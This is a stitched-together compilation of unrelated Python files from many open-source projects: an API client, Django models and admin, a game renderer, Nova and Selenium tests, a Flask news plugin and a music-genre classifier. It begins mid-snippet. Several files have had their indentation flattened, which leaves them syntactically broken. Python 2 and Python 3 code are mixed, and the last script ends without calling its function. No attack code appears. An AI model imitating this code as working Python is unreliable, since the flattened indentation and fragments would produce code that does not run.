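    "results": [
        {"recommendation_id": "a", "workflow": {"status": "NEW"}},
        {"recommendation_id": "b", "workflow": {"status": "ACCEPTED"}},
        {"recommendation_id": "c", "workflow": {"status": "NEW"}},
    ],
    "num_found": 3,
}
print([r["recommendation_id"] for r in filter_by_status(resp, {"NEW"})])  # ['a', 'c']
```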
# Source: dhf_wrapper/base_client.py from Enflow-io/dhf-pay-python (Apache-2.0)
from typing import Optional, Callable
import requests
from requests.auth import AuthBase
from requests.exceptions import RequestException
class BearerAuth(AuthBase):
def __init__(self, token):
self.token = token
def __call__(self, r):
r.headers['Authorization'] = f'Bearer {self.token}'
return r
class ServiceClient:
DEFAULT_MAX_RETRIES = 0
def __init__(
self,
base_url: str,
token: Optional[str] = None,
):
self.base_url = base_url.rstrip("/")
self.token = token
self.session = self._create_client_session()
def _dispose(self):
"""
        Close the underlying HTTP session
"""
self.session.close()
def _create_client_session(self):
"""
        Create a requests session with authentication attached
"""
session = requests.Session()
session.auth = self._get_http_auth()
return session
def _get_http_auth(self):
"""
        Resolve HTTP authentication for the session (returns None when no token is set)
"""
if self.token:
return BearerAuth(self.token)
def make_full_url(self, path: str) -> str:
"""
        Build a full URL by joining the base URL with the given path
:param path: str
:return: str
"""
return f"{self.base_url}{path}"
def _make_request(self, request: Callable, retries=DEFAULT_MAX_RETRIES, **kwargs) -> dict:
"""
        Perform an HTTP request, retrying on 5xx responses up to `retries` times
:param request: Callable
:return: dict
"""
try:
with request(**kwargs) as resp:
resp.raise_for_status()
return resp.json()
        except RequestException as e:
            # Retry only on server errors; e.response can be None (e.g. connection errors).
            if retries > 0 and e.response is not None and e.response.status_code >= 500:
                return self._make_request(request=request, retries=retries - 1, **kwargs)
            else:
                raise e
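The `BearerAuth` hook works by mutating each outgoing request's headers before `requests` sends it. A minimal sketch of that behavior, using a stand-in request object so the snippet runs without the `requests` package installed (`FakeRequest` is illustrative only, not a real `requests` class):

```python
class BearerAuth:
    """Mirrors the auth hook above: injects a Bearer token header."""

    def __init__(self, token):
        self.token = token

    def __call__(self, r):
        r.headers['Authorization'] = f'Bearer {self.token}'
        return r


class FakeRequest:
    """Stand-in for requests.PreparedRequest, for illustration."""

    def __init__(self):
        self.headers = {}


req = BearerAuth('s3cr3t')(FakeRequest())
print(req.headers['Authorization'])  # → Bearer s3cr3t
```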
# Source: flametree/utils.py from Edinburgh-Genome-Foundry/Flametree (MIT)
import os
import shutil
from .ZipFileManager import ZipFileManager
from .DiskFileManager import DiskFileManager
from .Directory import Directory
import string
printable = set(string.printable) - set("\x0b\x0c")
def is_hex(s):
    # True when `s` contains non-printable characters, i.e. it looks like
    # binary (zip) data rather than a file path. The name is historical.
    return any(c not in printable for c in s)
def file_tree(target, replace=False):
"""Open a connection to a file tree which can be either a disk folder, a
zip archive, or an in-memory zip archive.
Parameters
----------
target
Either the path to a target folder, or a zip file, or '@memory' to write
a zip file in memory (at which case a string of the zip file is returned)
If the target is already a flametree directory, it is returned as-is.
replace
If True, will remove the target if it already exists. If False, new files
will be written inside the target and some files may be overwritten.
"""
if isinstance(target, Directory):
return target
if (not isinstance(target, str)) or is_hex(target):
return Directory(file_manager=ZipFileManager(source=target))
elif target == "@memory":
return Directory("@memory", file_manager=ZipFileManager("@memory"))
elif target.lower().endswith(".zip"):
return Directory(target, file_manager=ZipFileManager(target, replace=replace))
else:
return Directory(target, file_manager=DiskFileManager(target))
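The dispatch in `file_tree` hinges on `is_hex`: a file path stays within the printable set, while raw zip bytes contain control characters. A self-contained illustration of that distinction (re-declaring the helper so the snippet runs on its own):

```python
import string

printable = set(string.printable) - set("\x0b\x0c")


def is_hex(s):
    # True when `s` contains non-printable characters, i.e. it looks
    # like binary archive data rather than a file path.
    return any(c not in printable for c in s)


print(is_hex("my_folder/archive.zip"))  # a path → False
print(is_hex("PK\x03\x04\x00\x00"))     # zip magic bytes → True
```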
# Source: audio/audio_client.py from artigianitecnologici/marrtino_apps (BSD-4-Clause)
import sys
import socket
import time
ip = '127.0.0.1'
port = 9001
if (len(sys.argv)>1):
ip = sys.argv[1]
if (len(sys.argv)>2):
port = int(sys.argv[2])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip,port))
sock.send(b'bip\n\r')
data = sock.recv(80)
print(data)
sock.send(b'TTS[it-IT] ciao, come stai?\n\r')
data = sock.recv(80)
print(data)
sock.send(b'TTS[en-US] very well, thank you!\n\r')
data = sock.recv(80)
print(data)
sock.send(b'TTS default language is english!\n\r')
data = sock.recv(80)
print(data)
sock.send(b'bop\n\r')
data = sock.recv(80)
print(data)
time.sleep(1)
sock.close()
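The script above repeats a strict send-command/read-reply exchange. A sketch of that pattern as a reusable helper, exercised over a loopback `socketpair` so it runs without the audio server (the queued `ok` reply is a stand-in for whatever the real server sends back):

```python
import socket


def send_cmd(sock, cmd, bufsize=80):
    """Send one command line and return the raw reply bytes."""
    sock.send(cmd.encode() + b'\n\r')
    return sock.recv(bufsize)


# Loopback pair standing in for the client <-> audio-server connection.
client, server = socket.socketpair()

server.send(b'ok\n')                  # stand-in server queues its reply
reply = send_cmd(client, 'bip')       # client sends 'bip\n\r', reads reply
assert server.recv(80) == b'bip\n\r'  # the command arrived server-side
print(reply)  # → b'ok\n'

client.close()
server.close()
```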
# Source: qmotor/message/matcher.py from yulinfeng000/qmotor (MIT)
from abc import ABC, abstractmethod
from typing import List
from .common import (
AtCell,
BasicMessage,
GroupMessage,
FriendMessage,
MsgCellType,
MessageType,
PlainCell,
)
from ..utils import is_str_blank, str_contains
class MsgMatcher(ABC):
def msg_chain_from_ctx(self, ctx):
return BasicMessage(ctx.msg).messageChain()
def get_cell_type(self, msg_cell):
return msg_cell.get("type", None)
@abstractmethod
def match(self, ctx) -> bool:
pass
class GroupMsg(MsgMatcher):
def match(self, ctx) -> bool:
return BasicMessage(ctx.msg).type() == MessageType.GroupMessage
class FriendMsg(MsgMatcher):
def match(self, ctx) -> bool:
return BasicMessage(ctx.msg).type() == MessageType.FriendMessage
class TempMsg(MsgMatcher):
def match(self, ctx) -> bool:
return BasicMessage(ctx.msg).type() == MessageType.TempMessage
class AtMsg(GroupMsg):
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
msg_chain = self.msg_chain_from_ctx(ctx)
return self.get_cell_type(msg_chain[1]) == MsgCellType.At
class AtMeMsg(AtMsg):
me_qq: int
def __init__(self, me_qq) -> None:
super(AtMeMsg, self).__init__()
self.me_qq = me_qq
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
msg_chain = GroupMessage(ctx.msg).messageChain()
at = AtCell(msg_chain[1])
return self.me_qq == at.target()
class JustAtMeMsg(AtMeMsg):
def __init__(self, me_qq) -> None:
super(JustAtMeMsg, self).__init__(me_qq)
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
msg_chain = self.msg_chain_from_ctx(ctx)
plain = PlainCell(msg_chain[2])
return is_str_blank(plain.text())
class AtMeCmdMsg(AtMeMsg):
cmd_list: List[str]
def __init__(self, me_qq, cmd) -> None:
super(AtMeCmdMsg, self).__init__(me_qq)
self.cmd_list = cmd
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
msg_chain = self.msg_chain_from_ctx(ctx)
return str_contains(PlainCell(msg_chain[2]).text(), self.cmd_list)
class SpecificFriendMsg(FriendMsg):
friend_qq: int
def __init__(self, friend_qq) -> None:
super(SpecificFriendMsg, self).__init__()
self.friend_qq = friend_qq
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
return self.friend_qq == FriendMessage(ctx.msg).friend_qq()
class SpecificGroupMsg(GroupMsg):
group_qq: int
def __init__(self, group_qq) -> None:
super(SpecificGroupMsg, self).__init__()
self.group_qq = group_qq
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
return self.group_qq == GroupMessage(ctx.msg).group_qq()
if __name__ == "__main__":
msg_matcher = JustAtMeMsg(123)
class Ctx:
def __init__(self, msg) -> None:
self.msg = msg
msg = {
"type": "GroupMessage",
"sender": {"id": 123, "nickname": "", "remark": ""},
"messageChain": [
{"type": "Source", "id": 123456, "time": 123456},
{"type": "At", "target": 1234, "display": "@Mirai"},
{"type": "Plain", "text": " "},
],
}
print(msg_matcher.match(Ctx(msg)))
# Source: main/admin.py from sinahmr/childf (MIT)
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as DjangoUserAdmin
from django.contrib.auth.models import Group
from django.utils.translation import ugettext_lazy as _
from main.models import UserInfo, User, Child, Volunteer, Donor, Letter, Need, PurchaseForInstitute, PurchaseForNeed, \
Activity, OngoingUserInfo
@admin.register(User)
class UserAdmin(DjangoUserAdmin):
class UserInfoInline(admin.TabularInline):
model = UserInfo
extra = 1
max_num = 1
fieldsets = (
(None, {'fields': ('email', 'password')}),
(_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}),
(_('Important dates'), {'fields': ('last_login', 'date_joined')}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'password1', 'password2'),
}),
)
list_display = ('email', 'userinfo', 'is_staff')
search_fields = ('email', 'userinfo__first_name', 'userinfo__last_name')
ordering = ('email',)
inlines = [UserInfoInline]
admin.site.unregister(Group)
admin.site.register(Child)
admin.site.register(Volunteer)
admin.site.register(Donor)
admin.site.register(Letter)
admin.site.register(Need)
admin.site.register(PurchaseForInstitute)
admin.site.register(PurchaseForNeed)
admin.site.register(Activity)
admin.site.register(OngoingUserInfo)
# Source: hunting/display/render.py from MoyTW/RL_Arena_Experiment (MIT)
import tdl
import time
import hunting.constants as c
class Renderer:
def __init__(self, main_console=None, level_display_width=c.SCREEN_WIDTH, level_display_height=c.SCREEN_HEIGHT):
if main_console is None:
self.main_console = tdl.init(level_display_width, level_display_height, 'From Renderer Default Constructor')
else:
self.main_console = main_console
self.level_display_width = level_display_width
self.level_display_height = level_display_height
self._level_console = tdl.Console(level_display_width, level_display_height)
def _render_level(self, con, level):
for x in range(level.width):
for y in range(level.height):
if level[x][y].blocks is not False:
self._level_console.draw_rect(x, y, 1, 1, None, bg=[120, 0, 50])
else:
self._level_console.draw_rect(x, y, 1, 1, None, bg=[30, 255, 30])
# TODO: This is pretty hacky!
i = 1
for o in level._all_objects:
if o.faction == '1': # TODO: Better faction implementation!
color = [255, 0, 0]
else:
color = [0, 0, 255]
self._level_console.draw_char(o.x, o.y, i, color)
i += 1
con.blit(self._level_console)
def render_all(self, level):
self._render_level(self.main_console, level)
tdl.flush()
def clear(self, level):
for o in level._all_objects:
self._level_console.draw_char(o.x, o.y, ' ')
def render_event(self, level, event):
if event[c.EVENT_TYPE] == c.MOVEMENT_EVENT:
# Clear previous location
self._level_console.draw_char(event[c.MOVEMENT_PREV_X], event[c.MOVEMENT_PREV_Y], ' ', bg=[0, 15, 7])
# Retrieve faction and color
o = level.get_object_by_id(event[c.OBJ_ID])
if o.faction == '1': # TODO: Better faction implementation!
color = [255, 0, 0]
else:
color = [0, 0, 255]
self._level_console.draw_char(event[c.OBJ_X], event[c.OBJ_Y], o.faction, fg=color)
elif event[c.EVENT_TYPE] == c.OBJECT_DESTRUCTION_EVENT:
self._level_console.draw_char(event[c.OBJ_X], event[c.OBJ_Y], ' ', bg=[0, 15, 7])
# Render
self.main_console.blit(self._level_console)
tdl.flush()
def visualize(level, show_time=1):
Renderer().render_all(level)
    time.sleep(show_time)
# Source: ideas/models.py from neosergio/hackatrix-api (Apache-2.0)
from django.db import models
class Idea(models.Model):
title = models.CharField(max_length=255, unique=True)
description = models.TextField()
author = models.OneToOneField('events.Registrant',
related_name='author_idea',
on_delete=models.CASCADE,
blank=True,
null=True)
written_by = models.ForeignKey('users.User',
related_name='written_idea',
on_delete=models.CASCADE,
blank=True,
null=True)
event = models.ForeignKey('events.Event',
related_name='event_idea',
on_delete=models.CASCADE,
blank=True,
null=True)
is_valid = models.BooleanField(default=False)
max_number_of_participants = models.PositiveIntegerField(default=7)
created_at = models.DateTimeField(auto_now_add=True)
modified_at = models.DateTimeField(auto_now=True)
is_active = models.BooleanField(default=True)
    class Meta:
ordering = ['-created_at', '-id']
def __str__(self):
return self.title
class IdeaTeamMember(models.Model):
idea = models.ForeignKey(Idea, related_name='idea_team_member', on_delete=models.CASCADE)
member = models.OneToOneField('events.Registrant', related_name='member_idea', on_delete=models.CASCADE)
    class Meta:
ordering = ['idea']
unique_together = ('idea', 'member')
verbose_name = 'Team Member'
verbose_name_plural = 'Groups'
# Source: Examples/PagesOperations/MovePage.py from groupdocs-merger-cloud/groupdocs-merger-cloud-python-samples (MIT)
# Import modules
import groupdocs_merger_cloud
from Common import Common
# This example demonstrates how to move document page to a new position
class MovePage:
@classmethod
def Run(cls):
pagesApi = groupdocs_merger_cloud.PagesApi.from_config(Common.GetConfig())
options = groupdocs_merger_cloud.MoveOptions()
options.file_info = groupdocs_merger_cloud.FileInfo("WordProcessing/four-pages.docx")
options.output_path = "Output/move-pages.docx"
options.page_number = 1
options.new_page_number = 2
result = pagesApi.move(groupdocs_merger_cloud.MoveRequest(options))
        print("Output file path = " + result.path)
# Source: src/models/predict_model.py from joseluistello/Regression-Analysis-Apple-Data (MIT)
# NOTE: this fragment assumes `ml` (a fitted regressor), `x_test`, `y_test`,
# and `pd` (pandas) are defined earlier in the pipeline.
y_pred = ml.predict(x_test)
print(y_pred)

from sklearn.metrics import r2_score
r2_score(y_test, y_pred)

pred_y_df = pd.DataFrame({'Actual Value': y_test,
                          'Predicted Value': y_pred,
                          'Difference': y_test - y_pred})
pred_y_df[0:20]
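For reference, `r2_score` reduces to 1 - SS_res/SS_tot. A dependency-free sketch of that computation on toy numbers (not the notebook's data):

```python
def r2_score_plain(y_true, y_pred):
    # R^2 = 1 - (residual sum of squares / total sum of squares)
    mean_y = sum(y_true) / len(y_true)
    ss_res = sum((t - p) ** 2 for t, p in zip(y_true, y_pred))
    ss_tot = sum((t - mean_y) ** 2 for t in y_true)
    return 1 - ss_res / ss_tot


y_true = [3.0, 5.0, 7.0, 9.0]
y_pred = [2.8, 5.1, 7.2, 8.9]
print(round(r2_score_plain(y_true, y_pred), 3))  # → 0.995
```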
d5c05a70d2bfb21530d973639155b0914281d250 | 1,882 | py | Python | greenbounty/bounties/migrations/0001_initial.py | Carnales/green-bounty | beb765082b32c096139463bf75ccc1ec3d530692 | [
"MIT"
] | 1 | 2021-01-18T21:43:05.000Z | 2021-01-18T21:43:05.000Z | greenbounty/bounties/migrations/0001_initial.py | Thinkr3/green-bounty | c74fe79121d211728c9f70ffd87e239c8ba5d131 | [
"MIT"
] | 1 | 2021-01-18T06:35:07.000Z | 2021-01-18T06:35:07.000Z | greenbounty/bounties/migrations/0001_initial.py | Thinkr3/green-bounty | c74fe79121d211728c9f70ffd87e239c8ba5d131 | [
"MIT"
] | 2 | 2021-01-18T06:22:50.000Z | 2021-01-18T06:24:22.000Z | # Generated by Django 3.1.4 on 2021-01-17 19:12
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Organization',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, null=True)),
('balance', models.FloatField()),
('total', models.FloatField()),
],
),
migrations.CreateModel(
name='Hunter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50, null=True)),
('image', models.ImageField(blank=True, null=True, upload_to='')),
('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Bounty',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, null=True)),
('image', models.ImageField(blank=True, null=True, upload_to='')),
('price', models.FloatField()),
('city', models.CharField(max_length=25, null=True)),
('hunter', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='bounties.hunter')),
],
),
]
# Source: nova/tests/virt/docker/test_driver.py from osrg/nova (Apache-2.0)
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2013 dotCloud, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import socket
import mock
from nova import context
from nova import exception
from nova.openstack.common import jsonutils
from nova.openstack.common import units
from nova import test
from nova.tests import utils
import nova.tests.virt.docker.mock_client
from nova.tests.virt.test_virt_drivers import _VirtDriverTestCase
from nova.virt.docker import hostinfo
from nova.virt.docker import network
class DockerDriverTestCase(_VirtDriverTestCase, test.TestCase):
driver_module = 'nova.virt.docker.DockerDriver'
def setUp(self):
super(DockerDriverTestCase, self).setUp()
self.stubs.Set(nova.virt.docker.driver.DockerDriver,
'docker',
nova.tests.virt.docker.mock_client.MockClient())
def fake_setup_network(self, instance, network_info):
return
self.stubs.Set(nova.virt.docker.driver.DockerDriver,
'_setup_network',
fake_setup_network)
def fake_get_registry_port(self):
return 5042
self.stubs.Set(nova.virt.docker.driver.DockerDriver,
'_get_registry_port',
fake_get_registry_port)
# Note: using mock.object.path on class throws
# errors in test_virt_drivers
def fake_teardown_network(container_id):
return
self.stubs.Set(network, 'teardown_network', fake_teardown_network)
self.context = context.RequestContext('fake_user', 'fake_project')
def test_driver_capabilities(self):
self.assertFalse(self.connection.capabilities['has_imagecache'])
self.assertFalse(self.connection.capabilities['supports_recreate'])
#NOTE(bcwaldon): This exists only because _get_running_instance on the
# base class will not let us set a custom disk/container_format.
def _get_running_instance(self, obj=False):
instance_ref = utils.get_test_instance(obj=obj)
network_info = utils.get_test_network_info()
network_info[0]['network']['subnets'][0]['meta']['dhcp_server'] = \
'1.1.1.1'
image_info = utils.get_test_image_info(None, instance_ref)
image_info['disk_format'] = 'raw'
image_info['container_format'] = 'docker'
self.connection.spawn(self.ctxt, jsonutils.to_primitive(instance_ref),
image_info, [], 'herp', network_info=network_info)
return instance_ref, network_info
def test_get_host_stats(self):
self.mox.StubOutWithMock(socket, 'gethostname')
socket.gethostname().AndReturn('foo')
socket.gethostname().AndReturn('bar')
self.mox.ReplayAll()
self.assertEqual('foo',
self.connection.get_host_stats()['host_hostname'])
self.assertEqual('foo',
self.connection.get_host_stats()['host_hostname'])
def test_get_available_resource(self):
memory = {
'total': 4 * units.Mi,
'free': 3 * units.Mi,
'used': 1 * units.Mi
}
disk = {
'total': 50 * units.Gi,
'available': 25 * units.Gi,
'used': 25 * units.Gi
}
# create the mocks
with contextlib.nested(
mock.patch.object(hostinfo, 'get_memory_usage',
return_value=memory),
mock.patch.object(hostinfo, 'get_disk_usage',
return_value=disk)
) as (
get_memory_usage,
get_disk_usage
):
# run the code
stats = self.connection.get_available_resource(nodename='test')
# make our assertions
get_memory_usage.assert_called_once_with()
get_disk_usage.assert_called_once_with()
expected_stats = {
'vcpus': 1,
'vcpus_used': 0,
'memory_mb': 4,
'memory_mb_used': 1,
            'local_gb': 50,
            'local_gb_used': 25,
            'disk_available_least': 25,
'hypervisor_type': 'docker',
'hypervisor_version': 1000,
'hypervisor_hostname': 'test',
'cpu_info': '?',
'supported_instances': ('[["i686", "docker", "lxc"],'
' ["x86_64", "docker", "lxc"]]')
}
self.assertEqual(expected_stats, stats)
def test_plug_vifs(self):
# Check to make sure the method raises NotImplementedError.
self.assertRaises(NotImplementedError,
self.connection.plug_vifs,
instance=utils.get_test_instance(),
network_info=None)
def test_unplug_vifs(self):
# Check to make sure the method raises NotImplementedError.
self.assertRaises(NotImplementedError,
self.connection.unplug_vifs,
instance=utils.get_test_instance(),
network_info=None)
def test_create_container(self, image_info=None):
instance_href = utils.get_test_instance()
if image_info is None:
image_info = utils.get_test_image_info(None, instance_href)
image_info['disk_format'] = 'raw'
image_info['container_format'] = 'docker'
self.connection.spawn(self.context, instance_href, image_info,
'fake_files', 'fake_password')
self._assert_cpu_shares(instance_href)
def test_create_container_vcpus_2(self, image_info=None):
flavor = utils.get_test_flavor(options={
'name': 'vcpu_2',
'flavorid': 'vcpu_2',
'vcpus': 2
})
instance_href = utils.get_test_instance(flavor=flavor)
if image_info is None:
image_info = utils.get_test_image_info(None, instance_href)
image_info['disk_format'] = 'raw'
image_info['container_format'] = 'docker'
self.connection.spawn(self.context, instance_href, image_info,
'fake_files', 'fake_password')
self._assert_cpu_shares(instance_href, vcpus=2)
def _assert_cpu_shares(self, instance_href, vcpus=4):
container_id = self.connection.find_container_by_name(
instance_href['name']).get('id')
container_info = self.connection.docker.inspect_container(container_id)
self.assertEqual(vcpus * 1024, container_info['Config']['CpuShares'])
def test_create_container_wrong_image(self):
instance_href = utils.get_test_instance()
image_info = utils.get_test_image_info(None, instance_href)
image_info['disk_format'] = 'raw'
image_info['container_format'] = 'invalid_format'
self.assertRaises(exception.InstanceDeployFailure,
self.test_create_container,
image_info)
@mock.patch.object(network, 'teardown_network')
@mock.patch.object(nova.virt.docker.driver.DockerDriver,
'find_container_by_name', return_value={'id': 'fake_id'})
def test_destroy_container(self, byname_mock, teardown_mock):
instance = utils.get_test_instance()
self.connection.destroy(self.context, instance, 'fake_networkinfo')
byname_mock.assert_called_once_with(instance['name'])
teardown_mock.assert_called_with('fake_id')
def test_get_memory_limit_from_sys_meta_in_object(self):
instance = utils.get_test_instance(obj=True)
limit = self.connection._get_memory_limit_bytes(instance)
self.assertEqual(2048 * units.Mi, limit)
def test_get_memory_limit_from_sys_meta_in_db_instance(self):
instance = utils.get_test_instance(obj=False)
limit = self.connection._get_memory_limit_bytes(instance)
self.assertEqual(2048 * units.Mi, limit)
# Source: tests/test_webdriver_chrome.py from kidosoft/splinter (BSD-3-Clause)
# -*- coding: utf-8 -*-
# Copyright 2013 splinter authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import os
import unittest
from splinter import Browser
from .fake_webapp import EXAMPLE_APP
from .base import WebDriverTests
from selenium.common.exceptions import WebDriverException
def chrome_installed():
try:
Browser("chrome")
except WebDriverException:
return False
return True
class ChromeBrowserTest(WebDriverTests, unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.browser = Browser("chrome")
@classmethod
def tearDownClass(cls):
cls.browser.quit()
def setUp(self):
self.browser.visit(EXAMPLE_APP)
def test_attach_file(self):
"should provide a way to change file field value"
file_path = os.path.join(
os.path.abspath(os.path.dirname(__file__)),
'mockfile.txt'
)
self.browser.attach_file('file', file_path)
self.browser.find_by_name('upload').click()
html = self.browser.html
self.assertIn('text/plain', html)
        self.assertIn(open(file_path).read(), html)
def test_should_support_with_statement(self):
with Browser('chrome') as internet:
pass
class ChromeBrowserFullscreenTest(WebDriverTests, unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.browser = Browser("chrome", fullscreen=True)
@classmethod
def tearDownClass(cls):
cls.browser.quit()
def setUp(self):
self.browser.visit(EXAMPLE_APP)
def test_should_support_with_statement(self):
with Browser('chrome', fullscreen=True) as internet:
pass

# File: flaskbb/plugins/news/views.py (from konstantin1985/forum)
# -*- coding: utf-8 -*-
from flask import Blueprint, redirect
from flaskbb.utils.helpers import render_template
from .forms import AddForm, DeleteForm
from .models import MyPost
from flaskbb.extensions import db
news = Blueprint("news", __name__, template_folder="templates")
def inject_news_link():
return render_template("navigation_snippet.html")
@news.route("/")
def index():
    return render_template("index.html", newsposts=MyPost.query.all())
@news.route('/add', methods=['GET', 'POST'])
def add():
form = AddForm()
if form.validate_on_submit():
        p = MyPost(name=form.name.data, text=form.text.data)
db.session.add(p)
db.session.commit()
return redirect('/news')
return render_template('add.html', form=form)
@news.route('/delete', methods=['GET', 'POST'])
def delete():
form = DeleteForm()
if form.validate_on_submit():
p = MyPost.query.filter(MyPost.name == form.name.data).first()
db.session.delete(p)
db.session.commit()
return redirect('/news')
return render_template('delete.html', form=form)

# File: src/main.py (from mafshar/sub-puppo)
#!/usr/bin/env python
'''
Notes:
- Weak implies weakly supervised learning (4 classes)
- Strong implies strongly (fully) superversied learning (10 classes)
- frame number is set to 22ms (default); that is the "sweet spot" based on dsp literature
- sampling rate is 16kHz (for the MFCC of each track)
- Accuracy increases as the test set gets smaller, which implies that a lot of these machine learning models are heavily data-driven (i.e. feed more data for more performance boosts)
- Currently, optimal benchmark results are achieved with a test set size of 10 percent of the total data
'''
import os
import glob
import sys
import time
import warnings
warnings.filterwarnings("ignore")
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from processing import mfcc_processing, datasets
from deep_models import models
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.cluster import KMeans
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import normalize
input_path = './data/genres/'
mfcc_path = './data/processed/mfcc/'
have_mfccs = True
def normalize_and_split(data, test_size, verbose=False):
scaler = MinMaxScaler()
features = scaler.fit_transform(data['features'])
labels = data['labels']
X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=test_size, random_state=42)
norm_data = {}
norm_data['X_train'] = X_train
norm_data['X_test'] = X_test
norm_data['y_train'] = y_train
norm_data['y_test'] = y_test
if verbose:
print 'Training sample feature size:', X_train.shape
print 'Training sample label size:', y_train.shape
print 'Test sample feature size:', X_test.shape
print 'Test sample label size:', y_test.shape
return norm_data
def svm_classifier(data, test_size, weak=False, verbose=False):
norm_data = normalize_and_split(data, test_size, verbose)
X_train = norm_data['X_train']
X_test = norm_data['X_test']
y_train = norm_data['y_train']
y_test = norm_data['y_test']
tic = time.time()
svm_clf = SVC(C=10000, kernel='poly', degree=3, tol=0.0001, max_iter=5000, decision_function_shape='ovr') if weak \
else SVC(C=10000, kernel='poly', degree=6, tol=0.01, max_iter=5000, decision_function_shape='ovr')
svm_clf.fit(X_train, y_train)
print 'TEST ACCURACY:', svm_clf.score(X_test, y_test)
toc = time.time()
if verbose:
print '\ttime taken for SVM classifier to run is', toc-tic
return
def knn_classifier(data, test_size, weak=False, verbose=False):
norm_data = normalize_and_split(data, test_size, verbose)
X_train = norm_data['X_train']
X_test = norm_data['X_test']
y_train = norm_data['y_train']
y_test = norm_data['y_test']
tic = time.time()
knn_clf = KNeighborsClassifier(n_neighbors=3, weights='distance', p=1, n_jobs=-1) if weak \
else KNeighborsClassifier(n_neighbors=8, weights='distance', p=1, n_jobs=-1)
knn_clf.fit(X_train, y_train)
print 'TEST ACCURACY:', knn_clf.score(X_test, y_test)
toc = time.time()
if verbose:
print '\ttime taken for KNN classifier to run is', toc-tic
return
def mfcc_nn_model(num_epochs, test_size, weak=False, verbose=False):
tic = time.time()
tensorize = datasets.ToTensor()
dataset = None
net = None
if weak:
dataset = datasets.MfccDatasetWeak(mfcc_path, tensorize)
net = models.MfccNetWeak()
else:
dataset = datasets.MfccDataset(mfcc_path, tensorize)
net = models.MfccNet()
trainloader, testloader = datasets.train_test_dataset_split(dataset)
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=0.1, momentum=0.8)
for epoch in range(num_epochs):
running_loss = 0.0
for i, data in enumerate(trainloader, 0):
inputs, labels = data
# zero the parameter gradients
optimizer.zero_grad()
# forward + backward + optimize
outputs = net(inputs)
loss = criterion(outputs, labels)
            loss.backward()
optimizer.step()
# print statistics
running_loss += loss.item()
            if verbose and i % 5 == 0:    # print every 5 mini-batches
                print('[%d, %5d] loss: %.3f' % (epoch + 1, i + 1, running_loss / 5))
running_loss = 0.0
correct = 0
total = 0
with torch.no_grad():
for data in testloader:
inputs, labels = data
outputs = net(inputs)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print 'TEST ACCURACY:', 1. * correct / total
toc = time.time()
if verbose:
print '\ttime taken for Mfcc NN to run is', toc-tic
return
if __name__ == '__main__':
mfccs = None
data = None
if not have_mfccs:
have_mfccs = True
print 'calculating mfccs...'
mfccs = mfcc_processing.write_mfccs(input_path, mfcc_path, True)
    else:
print 'retrieving mfccs...'
mfccs = mfcc_processing.read_mfccs(mfcc_path, True)
data = mfcc_processing.featurize_data(mfccs, weak=True, verbose=True)
print
weak = False
if weak:
data = mfcc_processing.featurize_data(mfccs, weak=True, verbose=True)
print
svm_classifier(data, test_size=0.10, weak=True, verbose=True)
print
knn_classifier(data, test_size=0.10, weak=True, verbose=True)
print
mfcc_nn_model(num_epochs=10, test_size=0.10, weak=True, verbose=True)
else:
data = mfcc_processing.featurize_data(mfccs, weak=False, verbose=True)
print
svm_classifier(data, test_size=0.10, weak=False, verbose=True)
print
knn_classifier(data, test_size=0.10, weak=False, verbose=True)
print
mfcc_nn_model(num_epochs=10, test_size=0.10, weak=False, verbose=True)

# File: datedfolder.py (from IgorRidanovic/flapi)
#! /usr/bin/env python
# -*- coding: utf-8 -*-
'''
Create a Baselight folder with current date and time stamp.
You must refresh the Job Manager after running the script.
Copyright (c) 2020 Igor Riđanović, Igor [at] hdhead.com, www.metafide.com
'''
import flapi
from getflapi import getflapi
from datetime import datetime
def make_dated_folder(ip, scene, foldername):
conn, msg = getflapi()
jobman = conn.JobManager
stamp = datetime.now().strftime('_%d-%b-%Y_%H.%M.%S')
try:
jobman.create_folder(ip, scene, foldername + stamp)
except flapi.FLAPIException:
print 'Could not create a folder.'
return False
# Cleanup
conn.close()
if __name__=='__main__':
conn, msg = getflapi()
print msg + '\n'
ip = 'localhost'
currentScene = 'Test01'
folderName = 'MyFolder'
